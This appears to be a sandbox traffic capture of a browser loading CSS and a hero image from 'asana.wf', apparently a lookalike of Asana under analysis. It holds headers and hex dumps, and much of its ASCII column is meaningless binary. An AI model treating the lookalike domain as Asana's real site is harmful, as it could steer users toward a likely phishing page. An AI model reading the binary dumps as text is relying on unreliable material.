                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 6f 72 64 65 72 2e 6d 6b 74 6f 42 75 74 74 6f 6e 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 7d 0a 62 75 74 74 6f 6e 2e 2d 64 61 72 6b 2c 0a 2e 62 75 74 74 6f 6e 2e 2d 64 61 72 6b 2c 0a 66 6f 72 6d 2e 6d 6b 74 6f 46 6f 72 6d 2e 6d 61 72 6b 65 74 69 6e 67 2d 65 6d 62 65 64 2d 66 6f 72 6d 20 2e 6d 6b 74 6f 42 75 74 74 6f 6e 52 6f 77 20 62 75 74 74 6f 6e 2e 2d 64 61 72 6b 2e 6d 6b 74 6f 42 75 74 74 6f 6e 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 44 30 45 31 30 3b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 30 44 30 45 31 30 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 7d 0a 62 75 74 74 6f 6e 2e 2d 64 61 72 6b
                                                                                                                                                                                                                    Data Ascii: order.mktoButton { border-color: #FFFFFF; color: #FFFFFF;}button.-dark,.button.-dark,form.mktoForm.marketing-embed-form .mktoButtonRow button.-dark.mktoButton { background-color: #0D0E10; border-color: #0D0E10; color: #FFFFFF;}button.-dark
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 20 32 29 3b 0a 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 63 61 6c 63 28 28 35 30 70 78 20 2d 20 31 65 6d 29 20 2f 20 32 29 3b 0a 7d 0a 2e 64 65 76 69 63 65 2d 6d 6f 62 69 6c 65 20 2e 68 6f 6d 65 70 61 67 65 20 62 75 74 74 6f 6e 2e 2d 6c 61 72 67 65 2e 2d 62 6f 72 64 65 72 2c 20 2e 64 65 76 69 63 65 2d 6d 6f 62 69 6c 65 20 2e 68 6f 6d 65 70 61 67 65 20 66 6f 72 6d 2e 6d 6b 74 6f 46 6f 72 6d 2e 6d 61 72 6b 65 74 69 6e 67 2d 65 6d 62 65 64 2d 66 6f 72 6d 20 2e 6d 6b 74 6f 42 75 74 74 6f 6e 52 6f 77 20 62 75 74 74 6f 6e 2e 2d 62 6f 72 64 65 72 2e 6d 6b 74 6f 42 75 74 74 6f 6e 2c 20 66 6f 72 6d 2e 6d 6b 74 6f 46 6f 72 6d 2e 6d 61 72 6b 65 74 69 6e 67 2d 65 6d 62 65 64 2d 66 6f 72 6d 20 2e 6d 6b 74 6f 42 75 74 74 6f 6e 52 6f 77 20 2e 64 65 76 69 63
                                                                                                                                                                                                                    Data Ascii: 2); padding-bottom: calc((50px - 1em) / 2);}.device-mobile .homepage button.-large.-border, .device-mobile .homepage form.mktoForm.marketing-embed-form .mktoButtonRow button.-border.mktoButton, form.mktoForm.marketing-embed-form .mktoButtonRow .devic
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 70 72 6f 6a 65 63 74 2d 6d 61 6e 61 67 65 6d 65 6e 74 20 62 75 74 74 6f 6e 2e 2d 6c 61 72 67 65 2e 2d 73 65 63 6f 6e 64 61 72 79 2e 6d 6b 74 6f 42 75 74 74 6f 6e 2c 0a 66 6f 72 6d 2e 6d 6b 74 6f 46 6f 72 6d 2e 6d 61 72 6b 65 74 69 6e 67 2d 65 6d 62 65 64 2d 66 6f 72 6d 20 2e 6d 6b 74 6f 42 75 74 74 6f 6e 52 6f 77 20 2e 64 65 76 69 63 65 2d 6d 6f 62 69 6c 65 20 2e 75 73 65 73 5f 5f 70 72 6f 6a 65 63 74 2d 6d 61 6e 61 67 65 6d 65 6e 74 20 62 75 74 74 6f 6e 2e 2d 73 65 63 6f 6e 64 61 72 79 2e 6d 6b 74 6f 42 75 74 74 6f 6e 2c 0a 2e 64 65 76 69 63 65 2d 6d 6f 62 69 6c 65 20 2e 68 6f 72 69 7a 6f 6e 74 61 6c 4e 61 76 69 67 61 74 69 6f 6e 5f 5f 6d 6f 62 69 6c 65 2d 62 75 74 74 6f 6e 73 20 62 75 74 74 6f 6e 2e 2d 6c 61 72 67 65 2e 2d 62 6f 72 64 65 72 2c 0a 2e 64
                                                                                                                                                                                                                    Data Ascii: project-management button.-large.-secondary.mktoButton,form.mktoForm.marketing-embed-form .mktoButtonRow .device-mobile .uses__project-management button.-secondary.mktoButton,.device-mobile .horizontalNavigation__mobile-buttons button.-large.-border,.d
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 2d 77 69 64 65 2c 20 2e 2d 77 69 64 65 2e 63 75 73 74 6f 6d 65 72 4d 61 72 71 75 65 65 2d 68 65 61 64 65 72 20 7b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 33 31 32 70 78 3b 0a 20 20 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 34 20 2a 20 33 32 70 78 29 3b 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 38 65 6d 29 20 7b 0a 20 20 2e 63 6f 6e 74 61 69 6e 65 72 2e 2d 77 69 64 65 2c 20 2e 2d 77 69 64 65 2e 63 75 73 74 6f 6d 65 72 4d 61 72 71 75 65 65 2d 68 65 61 64 65 72 2c 20 2e 63 6f 6e 74 61 69 6e 65 72 2e 2d 73 74 61 6e 64 61 72 64 2c 20 2e 2d 73 74 61 6e 64 61 72 64 2e 63 75 73 74 6f 6d 65 72 4d 61 72 71 75 65 65 2d 68 65 61 64 65 72 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 39 36
                                                                                                                                                                                                                    Data Ascii: -wide, .-wide.customerMarquee-header { max-width: 1312px; width: calc(100% - 4 * 32px);}@media (max-width: 48em) { .container.-wide, .-wide.customerMarquee-header, .container.-standard, .-standard.customerMarquee-header { width: calc(100% - 96
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 3b 0a 20 20 7d 0a 20 20 2e 63 6f 6c 2d 6d 65 64 69 75 6d 2d 6f 66 66 73 65 74 2d 35 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 31 2e 36 36 36 36 36 36 36 36 36 37 25 3b 0a 20 20 7d 0a 20 20 2e 63 6f 6c 2d 6d 65 64 69 75 6d 2d 6f 66 66 73 65 74 2d 36 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 7d 0a 20 20 2e 63 6f 6c 2d 6d 65 64 69 75 6d 2d 6f 66 66 73 65 74 2d 37 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 38 2e 33 33 33 33 33 33 33 33 33 33 25 3b 0a 20 20 7d 0a 20 20 2e 63 6f 6c 2d 6d 65 64 69 75 6d 2d 6f 66 66 73 65 74 2d 38 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 36 36 2e 36 36 36
                                                                                                                                                                                                                    Data Ascii: argin-left: 33.3333333333%; } .col-medium-offset-5 { margin-left: 41.6666666667%; } .col-medium-offset-6 { margin-left: 50%; } .col-medium-offset-7 { margin-left: 58.3333333333%; } .col-medium-offset-8 { margin-left: 66.666
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 30 65 6d 29 20 7b 0a 20 20 2e 63 6f 6c 2d 78 78 6c 61 72 67 65 2d 31 20 7b 0a 20 20 20 20 66 6c 65 78 2d 62 61 73 69 73 3a 20 38 2e 33 33 33 33 33 33 33 33 33 33 25 3b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 38 2e 33 33 33 33 33 33 33 33 33 33 25 3b 0a 20 20 7d 0a 20 20 2e 63 6f 6c 2d 78 78 6c 61 72 67 65 2d 32 20 7b 0a 20 20 20 20 66 6c 65 78 2d 62 61 73 69 73 3a 20 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 3b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 3b 0a 20 20 7d 0a 20 20 2e 63 6f 6c 2d 78 78 6c 61 72 67 65 2d 33 20 7b 0a 20 20 20 20 66 6c 65 78 2d 62 61 73 69 73 3a 20 32 35 25 3b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 32 35 25 3b 0a 20 20 7d
                                                                                                                                                                                                                    Data Ascii: a (min-width: 90em) { .col-xxlarge-1 { flex-basis: 8.3333333333%; max-width: 8.3333333333%; } .col-xxlarge-2 { flex-basis: 16.6666666667%; max-width: 16.6666666667%; } .col-xxlarge-3 { flex-basis: 25%; max-width: 25%; }
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 69 64 2e 6d 6b 74 6f 46 69 65 6c 64 20 7b 0a 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 45 44 34 37 35 38 3b 0a 7d 0a 2e 69 6e 70 75 74 2e 2d 77 61 72 6e 69 6e 67 2c 20 66 6f 72 6d 2e 6d 6b 74 6f 46 6f 72 6d 2e 6d 61 72 6b 65 74 69 6e 67 2d 65 6d 62 65 64 2d 66 6f 72 6d 20 69 6e 70 75 74 2e 2d 77 61 72 6e 69 6e 67 2e 6d 6b 74 6f 46 69 65 6c 64 2c 0a 66 6f 72 6d 2e 6d 6b 74 6f 46 6f 72 6d 2e 6d 61 72 6b 65 74 69 6e 67 2d 65 6d 62 65 64 2d 66 6f 72 6d 20 73 65 6c 65 63 74 2e 2d 77 61 72 6e 69 6e 67 2e 6d 6b 74 6f 46 69 65 6c 64 2c 0a 66 6f 72 6d 2e 6d 6b 74 6f 46 6f 72 6d 2e 6d 61 72 6b 65 74 69 6e 67 2d 65 6d 62 65 64 2d 66 6f 72 6d 20 74 65 78 74 61 72 65 61 2e 2d 77 61 72 6e 69 6e 67 2e 6d 6b 74 6f 46 69 65 6c 64 20 7b 0a 20 20 62 6f 72 64 65 72
                                                                                                                                                                                                                    Data Ascii: id.mktoField { border-color: #ED4758;}.input.-warning, form.mktoForm.marketing-embed-form input.-warning.mktoField,form.mktoForm.marketing-embed-form select.-warning.mktoField,form.mktoForm.marketing-embed-form textarea.-warning.mktoField { border


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.164970194.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:55 UTC528OUTGET /css/style.css HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC271INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:55 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "619-6164f3d1555f1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 1561
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: text/css
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC1561INData Raw: 2e 63 65 6e 74 65 72 65 64 2d 6c 69 6e 6b 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0d 0a 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 31 31 31 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 74 65 78 74 2d
                                                                                                                                                                                                                    Data Ascii: .centered-link { position: absolute; display: flex; align-items: center; justify-content: center; font-size: 22px; z-index: 1111; width: 100%; height: 100%; font-weight: 700; text-align: center; text-


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    3192.168.2.164970494.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC594OUTGET /img/HOME24-web-hero-3x-en-US.webp HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC228INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:56 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "438de-6164f3d1507d1"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 276702
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC7964INData Raw: 52 49 46 46 d6 38 04 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 ff 0e 00 2a 04 00 41 4c 50 48 44 28 01 00 01 19 37 6e 1b 49 12 2c 8c 77 83 ea ff bf f8 aa be 26 9a 20 a2 ff 13 a0 f9 a1 2d 7f 0b 2e 00 5b b0 e0 4b 88 83 a8 3f 94 49 17 64 b0 0b a5 07 4a 02 e7 a2 8f 3d e2 5a 7c 98 c4 51 d4 1b 28 43 d3 8f 90 fb 50 12 88 23 94 04 e8 02 32 38 02 df 51 4a 8c 11 6d a2 c4 18 d0 82 76 cb 6e 58 b6 2d 79 c8 f2 bf 9e 32 4a 62 dc 46 92 a2 ae ca 3f eb 65 38 78 46 c4 04 a4 4e af d3 99 e8 68 58 ab 9a d8 0c ff b9 6a b0 b9 4a 15 54 a3 d6 4a d8 21 d6 89 95 9b e6 b1 3c ea 49 6d 82 2a e0 74 c0 7a b0 84 b2 24 49 8a 24 2b 63 1f 33 bf 23 bf 3b fe ff 57 f0 95 99 99 5d a4 d3 21 32 6b a0 e7 61 c4 04 50 82 24 c9 76 db ac e4 0f 10 00 99 dd 6f 00 0e 14 3e fa c4 01 db b6 65 db 9c
                                                                                                                                                                                                                    Data Ascii: RIFF8WEBPVP8X*ALPHD(7nI,w& -.[K?IdJ=Z|Q(CP#28QJmvnX-y2JbF?e8xFNhXjJTJ!<Im*tz$I$+c3#;W]!2kaP$vo>e
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 84 42 db 29 f6 ea b6 08 28 0c 31 8c 8f 11 4d 4c 1c 16 d1 97 68 04 9b e3 b3 54 a2 6b c4 5f 75 0d 63 8a 3c be 4f 08 36 e9 78 9e ee 43 e1 d8 22 8f 92 30 cc 13 5a 80 3e f0 c8 43 01 1f 12 76 e4 f1 87 f3 2c c4 3c ac 58 a9 47 12 69 2c f6 01 01 c4 50 ac 40 bc 20 ea 00 1b d2 2f 20 16 e7 2d 0c c1 7f cb ad 3a 44 02 21 bb 3c 4d a8 e7 0b e9 ce ab 2e 94 6d 8c 45 07 99 c2 e7 b8 62 99 51 3f 12 8e c7 a9 f2 14 7b 55 e4 9f af 22 88 b2 62 7a 83 34 25 4d de b3 0c e0 c1 25 4d ea 47 21 20 02 50 83 25 15 7d 5c 01 8d 91 ef 28 0a c8 26 53 7c 95 c7 6e 63 9d 67 a3 1a 79 a0 0d f4 ae c9 08 0b 91 6f a3 6e 89 7b 15 59 0e 01 c3 18 5b 12 9d 31 8f 63 8b 3c 1b e0 a1 0c 66 4a 15 68 9f 46 9e 40 d1 21 cd 87 22 0c 51 4f 31 86 8d 3c 4a ea e6 59 38 9a 07 7c d9 b3 2b c0 f8 fe 03 13 60 ef ef bf 4b
                                                                                                                                                                                                                    Data Ascii: B)(1MLhTk_uc<O6xC"0Z>Cv,<XGi,P@ / -:D!<M.mEbQ?{U"bz4%M%MG! P%}\(&S|ncgyon{Y[1c<fJhF@!"QO1<JY8|+`K
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 05 fe ac d8 7f e6 b7 00 28 bb 20 3c 00 96 41 2d a4 d3 8c 69 03 19 79 b0 b9 6a 95 67 70 28 ab 90 a6 c9 d8 e8 c9 bc 82 a2 05 dc a8 ba ea 27 b2 02 04 0c c3 0a 29 f7 9f 97 9b 4b 2e 98 5b 26 91 99 aa 40 4c bf 5a 70 c0 cc 47 a6 3a 42 7f f5 d2 99 7c 9d fe e6 61 cc 7f 51 c2 4d 09 b0 c7 9d e7 ad f5 14 b0 a9 8a 11 3c 06 39 f2 88 00 99 ba b5 47 fd 9b 19 56 69 66 5e 07 a4 4f d5 e7 18 4c ba 8e 30 ec ab 29 d0 d6 5d e5 3f 66 2b c4 f5 2c 47 0f 09 9c 41 c4 06 51 4b c5 12 7a a5 eb 9b 32 b6 ab 7f a8 c1 7a 88 0c b3 bf 6c bd 6d 83 f8 98 cf 3d 9d 55 9e 4c dd 71 69 9b ba 26 18 88 99 17 be 34 ac a1 c2 f0 56 21 9f 88 d4 51 77 2e ed 70 bb e1 79 4a 6e 40 cd 6d 58 4b 94 10 3d d6 36 9f 7d af 64 11 c2 84 18 93 ac d1 4d c5 a9 82 41 12 51 f2 56 e7 34 a7 01 a7 bf 25 e4 34 91 28 c0 5c 92
                                                                                                                                                                                                                    Data Ascii: ( <A-iyjgp(')K.[&@LZpG:B|aQM<9GVif^OL0)]?f+,GAQKz2zlm=ULqi&4V!Qw.pyJn@mXK=6}dMAQV4%4(\
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 25 41 16 ae 2c 45 a2 26 eb c5 c7 05 05 ec e0 3e b4 3c 71 f5 2b 1b 5c 81 9e 12 98 08 a3 11 3b 89 33 6c ae 2c cd 42 63 4f 81 66 bd 51 57 94 03 8a e5 a7 85 ee 17 b5 0c d0 c9 9f e4 a0 c0 bd 4f 72 17 ba 13 33 f4 45 b9 0e 6b f1 72 20 43 7b 08 ad 96 5f 90 94 2a 15 3c 97 a0 24 21 13 46 62 17 30 70 2d 55 89 20 fa 66 10 39 62 b7 f0 70 80 e1 b1 2b 4d 66 b1 59 9e 64 37 ac 4a b7 89 13 0d 1b 6b 59 98 c2 83 5a 15 a2 6a 9e 33 7f 83 0b ba ea 1a 2a b1 44 eb c3 11 cb 11 2f 98 05 f6 3c c1 56 34 01 e7 6d d9 27 5d e0 5e 89 4e 12 a3 02 40 9e c0 64 19 76 57 17 9d 6a be 2e 70 60 f2 3b e1 98 4a 00 cd f5 6f a4 25 9e a7 35 09 17 55 1e c5 e2 2e b4 ec 60 8a a6 31 d5 85 d0 49 2a 19 13 a7 b5 01 de 57 cb 26 ff fd b2 97 da 72 2b 50 a1 00 7d f1 4f 14 70 de 3a 28 a0 ab 8a 11 3c 06 49 5e 01
                                                                                                                                                                                                                    Data Ascii: %A,E&><q+\;3l,BcOfQWOr3Ekr C{_*<$!Fb0p-U f9bp+MfYd7JkYZj3*D/<V4m']^N@dvWj.p`;Jo%5U.`1I*W&r+P}Op:(<I^
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: af f9 9f 7f fb df be 18 e7 d1 56 71 94 1e 13 1c 61 3b 9f ea 4d 7f f7 e7 ff d1 17 bd b1 73 86 57 7c e9 df fa 4f af 44 ec 60 33 72 a7 54 a2 13 66 ac 3b cf 43 6d 3f 93 25 31 fb a8 56 18 e0 dc d2 1a 2c 43 1b 10 f7 9f f1 23 7e d1 87 3e 6f 76 87 57 7d c5 df fe 77 2f 0f d9 3a ea 20 00 a8 0c 48 ab a1 48 22 a2 20 5e fb e7 3f f2 e7 fd a8 b7 7b 52 d3 0c 2f ff 2f 7f f3 3f bf e6 26 76 2d 30 12 a8 8f f0 04 02 11 31 10 c6 8e 23 9f 70 e0 f5 ff f2 d9 1f fc c3 3f f4 dd df 7e 56 7b e6 e0 47 9f fa c0 d7 7c e5 7f 7a 29 63 49 62 54 02 73 cb 60 e2 30 ca 81 e7 ff 9e 9f f0 5b fe c1 ff f8 67 7f e7 cf fd e9 e5 ba ff da ef fb ce af fe d2 2f 0b 7f 6f 87 96 18 23 68 31 46 a0 3e 7f 7e 32 ec 40 f3 5f 0d 48 db 00 67 7c bb eb 73 3f ec 87 7f f0 bb fd 80 a7 cf 6a c8 79 dd 8b bf eb ab bf fc
                                                                                                                                                                                                                    Data Ascii: Vqa;MsW|OD`3rTf;Cm?%1V,C#~>ovW}w/: HH" ^?{R//?&v-01#p?~V{G|z)cIbTs`0[g/o#h1F>~2@_Hg|s?jy
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: bb 96 a7 f3 fa 96 51 84 8d 25 52 30 44 a4 fa 39 b3 90 b3 7f 2d 2e dd aa bb d6 ad 57 dd 5e 1e 9d 73 3c 4f 00 75 f2 40 d1 0b 5b 10 37 ca 22 46 06 b3 fb e8 76 4d e4 47 e0 81 a2 09 92 6c 51 40 55 ae 74 fb f0 e2 bf 73 20 ce 76 78 79 9e a3 3b 1e f3 9b 11 cb 39 f3 7d 7a 0a 4f e6 99 91 68 b6 9a 15 5e 91 30 58 a5 cf 51 90 d3 f1 e2 dd f3 dc bf 74 ac f7 5d 3e 6d c4 1b 1e 0a 22 51 81 42 98 82 64 76 13 47 0f 6c c0 34 b2 da 84 66 bb c4 00 e1 08 98 19 ab 30 18 f3 7d dc 8c ba 0f cb f3 e2 57 5d f0 9d ef 90 17 f2 ec a8 19 56 bd 7a 81 19 10 74 ba 27 8d 3b 38 51 b8 25 80 72 19 57 dd 1f eb a1 90 a3 c8 c2 59 01 43 10 a6 0b 1b e2 46 d7 b6 3c 72 a0 b0 01 51 6a 08 d4 14 09 45 93 64 0c 00 3b 57 09 62 a6 0a 66 03 eb 5a ce 61 12 e8 c6 8a 97 67 29 23 21 8b 65 6b 9e 67 f1 11 79 16 da
                                                                                                                                                                                                                    Data Ascii: Q%R0D9-.W^s<Ou@[7"FvMGlQ@Uts vxy;9}zOh^0XQt]>m"QBdvGl4f0}W]Vzt';8Q%rWYCF<rQjEd;WbfZag)#!ekgy
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: d5 4e a3 8b b8 5c c4 40 bc 00 36 13 08 1b eb 9b fe 2c 60 a4 c1 22 88 82 99 1f e0 9a 98 c3 63 a7 fa 07 36 f2 18 04 74 94 ba 25 4e c3 06 39 ae 47 c3 07 06 40 25 c1 40 c3 96 2a 47 d5 3f 74 9d f0 e7 c3 ec 57 28 66 b5 06 57 1e 7f 6c 45 cd ea 61 3b 84 5f 13 3a 4c ff 0c 04 c8 e3 dd bc cb 7e a4 49 2d 97 c2 f7 58 a0 a6 15 36 4d af 0f e5 13 df e6 bf 43 2e 0d 26 1c d6 cf 7e 34 72 01 18 4e 36 2a 24 d1 63 0e 4a 93 e5 04 00 eb d1 4d 42 c0 7e 9a 6c 73 f5 0c c7 cf 34 bf dd a2 30 3b 18 4a d4 12 08 3f 08 60 58 02 88 02 d9 90 a6 72 ac 0d 8e e8 97 81 00 9d 35 2f 83 b6 59 cc 66 aa 76 2e 40 91 8a e2 a0 2d 59 7d e6 8d b0 e5 08 eb d1 39 ca 71 35 30 af 50 9b d2 ea ca 9e 99 f9 6b 5b 7d 43 db d6 aa 73 27 f3 e9 cf db 2c 94 29 24 52 00 4e 34 f4 55 41 d2 27 38 6f 2b f6 87 45 b0 42 88
                                                                                                                                                                                                                    Data Ascii: N\@6,`"c6t%N9G@%@*G?tW(fWlEa;_:L~I-X6MC.&~4rN6*$cJMB~ls40;J?`Xr5/Yfv.@-Y}9q50Pk[}Cs',)$RN4UA'8o+EB
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: ae a7 64 96 b7 ad da d7 41 f3 f0 a2 08 31 1a 4e 12 e8 a8 2e b9 51 24 2e 44 82 61 98 0e 5c 1b 78 76 a8 4b b0 69 f1 3a ab 03 08 46 e2 58 91 98 66 35 81 2a 14 24 6e b3 ad ca 92 d5 3b 10 28 68 88 16 a4 0b 75 48 41 69 b3 7c 07 9a 78 61 9b 9c 92 bd bb ca 38 e1 2e dd 65 ed a4 e0 d4 ab 9d cc b5 c0 8a 2e b4 28 f5 95 37 12 41 d6 91 03 cb d0 7e 43 06 80 71 fd 24 62 c1 7e 34 07 46 f1 e4 b6 a3 02 b6 64 69 5d 13 f2 c8 7d 92 60 e6 d5 0e 9c 5a 88 15 87 be 42 d1 e9 05 56 2a ad e5 8c 5a 7c 08 84 73 80 ab 20 77 d6 65 52 e1 89 62 d9 95 26 72 10 8c 07 3b 4c fe 50 79 23 8d 70 14 f1 cf be 2e 10 97 13 0c c0 09 03 a6 f9 d3 58 df ae 04 45 d5 67 44 98 fa 8a 84 e3 52 57 60 98 ce ad ea bf cb 06 44 93 14 bf ec ab 80 2d ea c6 ed 96 46 d6 5c 90 8e 11 03 60 71 4e a9 18 f5 f4 94 f3 d1 a8
                                                                                                                                                                                                                    Data Ascii: dA1N.Q$.Da\xvKi:FXf5*$n;(huHAi|xa8.e.(7A~Cq$b~4Fdi]}`ZBV*Z|s weRb&r;LPy#p.XEgDRW`D-F\`qN
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 43 99 a3 f8 5e d1 1a 8d f6 39 f9 a6 01 f7 ce 18 5c d0 bf aa 25 6c 03 1a 21 0f 8a 11 46 17 bc 62 25 50 c3 44 37 5d 01 31 96 d1 e2 c9 31 ed 42 cf 6a 52 6c fb c8 f4 28 17 f6 58 ff b0 f8 a4 ba 1d 50 78 53 00 e6 5f 15 67 09 1a 3a fc f4 0c db d0 7d f5 cd 0b 00 25 7b a3 af bc 93 e6 b2 bd 78 9b 9e 1d 30 42 c7 a4 ab 02 59 99 d2 e9 69 61 62 5b f5 0f db 42 24 00 4e e3 98 7a 1f 4c ca 4e 58 0e 57 b8 0b 1d 1f 76 a0 2f 67 7e c3 5e 08 4d 36 ec ac 73 00 30 04 46 ef 8a 32 e9 29 6d a0 24 d1 b7 86 a0 97 cd f7 d8 07 64 e4 d6 47 39 2d a6 5d f6 d4 fa 03 5b 88 0e 0e 65 1c dc 8a d4 4e b4 a2 02 03 87 92 37 94 b6 b1 5e 5c 92 fc 66 24 0e 7b 52 70 e6 35 cf 14 43 cb 10 22 55 40 70 74 68 aa aa 54 2b 39 5a a7 a6 bf 53 24 2f 4d c0 6e f6 7f 78 60 66 78 4d 15 af 99 65 68 66 9a e7 1a 14 25
